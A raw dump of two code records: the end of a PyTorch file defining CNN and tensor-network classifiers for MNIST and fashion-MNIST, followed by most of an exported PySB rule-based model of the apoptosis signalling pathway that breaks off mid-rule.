num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(9):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 64, 1, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n x = x.squeeze()\r\n # print(x.sum(dim=1))\r\n return x\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected3():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected3'\r\n para['batch_size'] = 400\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected3_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST\r\n f-MNIST(d=4, chi=24) 0.9768 0.8862\r\n \"\"\"\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected3_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_PoolTI_2by2to1(\r\n 1, 1, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x):\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n x = x.squeeze()\r\n # print(x.sum(dim=1))\r\n return x\r\n\r\n\r\ndef Paras_VL_CNN():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN'\r\n para['batch_size'] = 600\r\n para['normalize_tensors'] = 'norm2'\r\n\r\n para['mps_init'] = 'randn'\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST\r\n f-MNIST 0.962283 0.8917\r\n \"\"\"\r\n def __init__(self, para_tn):\r\n super(VL_CNN_BP, self).__init__(num_layers=6)\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n 
nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n self.layer3 = nn.Sequential(\r\n nn.Linear(64*4, 64),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(64, para_tn['channel']),\r\n nn.Sigmoid()\r\n ).to(device=para_tn['device'])\r\n\r\n def forward(self, x):\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(4):\r\n if n == 3:\r\n x = x.reshape(num, -1)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n x = x.squeeze()\r\n # print(x.sum(dim=1))\r\n return x\r\n\r\n\r\n\r\n\r\n"} {"ext": "py", "sha": "1a309747944874819deadeeae08a916c713b861e", "content": "# exported from PySB model 'model'\n\nfrom pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD\n\nModel()\n\nMonomer('Ligand', ['Receptor'])\nMonomer('ParpU', ['C3A'])\nMonomer('C8A', ['BidU', 'C3pro'])\nMonomer('SmacM', ['BaxA'])\nMonomer('BaxM', ['BidM', 'BaxA'])\nMonomer('Apop', ['C3pro', 'Xiap'])\nMonomer('Fadd', ['Receptor', 'C8pro'])\nMonomer('SmacC', ['Xiap'])\nMonomer('ParpC')\nMonomer('Xiap', ['SmacC', 'Apop', 'C3A'])\nMonomer('C9')\nMonomer('C3ub')\nMonomer('C8pro', ['Fadd', 'C6A'])\nMonomer('Bcl2', ['BidM', 'BaxA'])\nMonomer('C3pro', ['Apop', 'C8A'])\nMonomer('CytoCM', ['BaxA'])\nMonomer('CytoCC')\nMonomer('BaxA', ['BaxM', 'Bcl2', 'BaxA_1', 'BaxA_2', 'SmacM', 'CytoCM'])\nMonomer('ApafI')\nMonomer('BidU', ['C8A'])\nMonomer('BidT')\nMonomer('C3A', ['Xiap', 'ParpU', 'C6pro'])\nMonomer('ApafA')\nMonomer('BidM', ['BaxM', 'Bcl2'])\nMonomer('Receptor', ['Ligand', 'Fadd'])\nMonomer('C6A', ['C8pro'])\nMonomer('C6pro', ['C3A'])\n\nParameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)\nParameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)\nParameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)\nParameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)\nParameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr', 1.0)\nParameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)\nParameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)\nParameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 
1.0)\nParameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)\nParameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)\nParameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)\nParameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)\nParameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)\nParameter('inhibition_0_Bcl2_inhibitor_BidM_inh_target_2kf', 1.0)\nParameter('inhibition_0_Bcl2_inhibitor_BidM_inh_target_1kr', 1.0)\nParameter('inhibition_0_Bcl2_inhibitor_BaxA_inh_target_2kf', 1.0)\nParameter('inhibition_0_Bcl2_inhibitor_BaxA_inh_target_1kr', 1.0)\nParameter('pore_formation_0_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_0_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_1_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_1_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_2_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_2_BaxA_pore_1kr', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc', 1.0)\nParameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr', 1.0)\nParameter('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('Ligand_0', 1000.0)\nParameter('ParpU_0', 1000000.0)\nParameter('C8A_0', 0.0)\nParameter('SmacM_0', 100000.0)\nParameter('BaxM_0', 40000.0)\nParameter('Apop_0', 0.0)\nParameter('Fadd_0', 130000.0)\nParameter('SmacC_0', 0.0)\nParameter('ParpC_0', 0.0)\nParameter('Xiap_0', 82500.0)\nParameter('C9_0', 100000.0)\nParameter('C3ub_0', 0.0)\nParameter('C8pro_0', 130000.0)\nParameter('Bcl2_0', 328000.0)\nParameter('C3pro_0', 21000.0)\nParameter('CytoCM_0', 500000.0)\nParameter('CytoCC_0', 0.0)\nParameter('BaxA_0', 0.0)\nParameter('ApafI_0', 
100000.0)\nParameter('BidU_0', 171000.0)\nParameter('BidT_0', 0.0)\nParameter('C3A_0', 0.0)\nParameter('ApafA_0', 0.0)\nParameter('BidM_0', 0.0)\nParameter('Receptor_0', 100.0)\nParameter('C6A_0', 0.0)\nParameter('C6pro_0', 100.0)\n\nObservable('Ligand_obs', Ligand())\nObservable('ParpU_obs', ParpU())\nObservable('C8A_obs', C8A())\nObservable('SmacM_obs', SmacM())\nObservable('BaxM_obs', BaxM())\nObservable('Apop_obs', Apop())\nObservable('Fadd_obs', Fadd())\nObservable('SmacC_obs', SmacC())\nObservable('ParpC_obs', ParpC())\nObservable('Xiap_obs', Xiap())\nObservable('C9_obs', C9())\nObservable('C3ub_obs', C3ub())\nObservable('C8pro_obs', C8pro())\nObservable('Bcl2_obs', Bcl2())\nObservable('C3pro_obs', C3pro())\nObservable('CytoCM_obs', CytoCM())\nObservable('CytoCC_obs', CytoCC())\nObservable('BaxA_obs', BaxA())\nObservable('ApafI_obs', ApafI())\nObservable('BidU_obs', BidU())\nObservable('BidT_obs', BidT())\nObservable('C3A_obs', C3A())\nObservable('ApafA_obs', ApafA())\nObservable('BidM_obs', BidM())\nObservable('Receptor_obs', Receptor())\nObservable('C6A_obs', C6A())\nObservable('C6pro_obs', C6pro())\n\nRule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)\nRule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)\nRule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None, C6A=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)\nRule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None, C3pro=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)\nRule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None, C3pro=None) + BidU(C8A=None) | C8A(BidU=1, C3pro=None) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)\nRule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1, C3pro=None) % BidU(C8A=1) >> C8A(BidU=None, C3pro=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)\nRule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)\nRule('inhibition_0_SmacC_inhibitor_Xiap_inh_target', SmacC(Xiap=None) + Xiap(SmacC=None, Apop=None, C3A=None) | SmacC(Xiap=1) % Xiap(SmacC=1, Apop=None, C3A=None), inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf, inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr)\nRule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)\nRule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None, C8A=None) | Apop(C3pro=1, Xiap=None) % 
C3pro(Apop=1, C8A=None), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(SmacC=None, Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(SmacC=None, Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)\nRule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None, C6pro=None) | Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)\nRule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None) >> Xiap(SmacC=None, Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)\nRule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None, C6pro=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)\nRule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)\nRule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None, Bcl2=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)\nRule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None, Bcl2=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1, Bcl2=None) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)\nRule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1, Bcl2=None) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None, Bcl2=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)\nRule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)\nRule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)\nRule('inhibition_0_Bcl2_inhibitor_BidM_inh_target', Bcl2(BidM=None, BaxA=None) + BidM(BaxM=None, Bcl2=None) | Bcl2(BidM=1, BaxA=None) % BidM(BaxM=None, Bcl2=1), inhibition_0_Bcl2_inhibitor_BidM_inh_target_2kf, 
inhibition_0_Bcl2_inhibitor_BidM_inh_target_1kr)\nRule('inhibition_0_Bcl2_inhibitor_BaxA_inh_target', Bcl2(BidM=None, BaxA=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) | Bcl2(BidM=None, BaxA=1) % BaxA(BaxM=None, Bcl2=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), inhibition_0_Bcl2_inhibitor_BaxA_inh_target_2kf, inhibition_0_Bcl2_inhibitor_BaxA_inh_target_1kr)\nRule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)\nRule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)\nRule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)\nRule('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacM(BaxA=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5), transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf, transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5) >> BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacC(Xiap=None), 
transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc)\nRule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)\nRule('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=None) + C3pro(Apop=None, C8A=None) | C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1), catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1) >> C8A(BidU=None, 